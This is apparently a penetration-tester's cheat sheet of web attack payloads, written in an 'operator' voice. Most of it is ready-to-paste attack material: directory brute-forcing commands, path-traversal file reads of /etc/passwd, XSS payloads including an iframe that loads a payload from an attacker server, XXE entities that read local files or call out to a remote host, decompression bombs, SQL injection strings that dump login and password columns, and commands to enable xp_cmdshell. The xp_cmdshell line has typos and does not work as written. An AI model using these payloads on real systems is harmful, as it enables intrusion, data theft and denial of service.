Web Exploit#
A short tradecraft sheet for the operator working web targets. The page covers enumeration, local file inclusion, reflected and persistent cross-site scripting, XML vulnerabilities, and manual SQL injection. Payloads come straight from the field handbook, the wrappers around them are operator-voice.
Web enumeration#
Dirsearch.
$ dirsearch -u example.com -e sh,txt,htm,php,cgi,html,pl,bak,old
$ dirsearch -u example.com -e sh,txt,htm,php,cgi,html,pl,bak,old -w path/to/wordlist
$ dirsearch -u https://example.com -e .
Dirb.
$ dirb http://target.com /path/to/wordlist
$ dirb http://target.com /path/to/wordlist -X .sh,.txt,.htm,.php,.cgi,.html,.pl,.bak,.old
Gobuster.
$ gobuster -u https://target.com -w /usr/share/wordlists/dirb/big.txt
Local file inclusion#
Vulnerable parameter form.
http://<target>/index.php?parameter=value
Ways to verify.
http://<target>/index.php?parameter=php://filter/convert.base64-encode/resource=index
http://<target>/script.php?page=../../../../../../../etc/passwd
http://<target>/script.php?page=../../../../../../../boot.ini
LFI payload lists.
XSS reflected#
Simple tests.
<script>alert('Found')</script>
"><script>alert(Found)</script>"
<script>alert(String.fromCharCode(88,83,83))</script>
Bypass tag filtering.
" onload="alert(String.fromCharCode(88,83,83))
" onload="alert('XSS')
<img src='bla' onerror=alert("XSS")>
Persistent.
>document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>HELLOWORLD!</h1></div>";
Download via XSS.
<iframe src="http://OUR_SERVER_IP/PAYLOAD" height="0" width="0"></iframe>
XSS payload lists.
XML vulnerabilities#
XXE classic.
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
Windows.
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
Out-of-band.
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
DoS via blocking read of /dev/random.
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///dev/random" >]><foo>&xxe;</foo>
Other XXE payloads.
DTD retrieval, decompression bombs (zip / gzip / LZMA), XPath injection, XInclude, and XSLT abuse round out the XML attack surface.
Decompression bomb#
$ dd if=/dev/zero bs=1M count=1024 | gzip > zeros.gz
$ dd if=/dev/zero bs=1M count=1024 | lzma -z > zeros.xy
$ ls -sh zeros.*
1020K zeros.gz
148K zeros.xy
Manual SQLi#
Quote probe.
http://<IP>/Less-1/?id=5'
Order-by fuzzing to find column count.
http://<IP>/Less-1/?id=-1 order by 1
http://<IP>/Less-1/?id=-1 order by 2
http://<IP>/Less-1/?id=-1 order by 3
Find the injectable column.
MySQL: http://<IP>/Less-1/?id=-1 union select 1, 2, 3
Postgres: http://<IP>/Less-1/?id=-1 union select NULL, NULL, NULL
Versions and database names.
MySQL: http://<IP>/Less-1/?id=-1 union select 1, 2, version()
Postgres: http://<IP>/Less-1/?id=-1 union select NULL, NULL, version()
MySQL: http://<IP>/Less-1/?id=-1 union select 1, 2, database()
Postgres: http://<IP>/Less-1/?id=-1 union select NULL,NULL, database()
Current user, schemas, tables, columns, concatenate.
http://<IP>/Less-1/?id=-1 union select 1, 2, current_user()
http://<IP>/Less-1/?id=-1 union select 1, 2, schema_name from information_schema.schemata
http://<IP>/Less-1/?id=-1 union select 1, 2, table_name from information_schema.tables where table_schema="database_name"
http://<IP>/Less-1/?id=-1 union select 1, 2, column_name from information_schema.columns where table_schema="database_name" and table_name="tablename"
http://<IP>/Less-1/?id=-1 union select 1, 2, concat(login,':',password) from users;
Error-based SQLi (usually MSSQL)#
http://<IP>/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(user_name() as varchar(4096)))--
http://<IP>/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(@@version as varchar(4096)))--
http://<IP>/Less-1/?id=-1 or db_name(0)=0 --
http://<IP>/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(name as varchar(4096)) FROM dbname..sysobjects where xtype='U')--
Shell out via xp_cmdshell (need sa privileges).
EXEC master..xp_cmdshell <command>
Enable shell commands.
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_congigure 'xp_shell', 1; RECONFIGURE;
Online tool#
Unfurl takes a URL and expands (“unfurls”) it into a directed graph, extracting every bit of information from the URL and exposing what is obscured. https://dfir.blog/unfurl/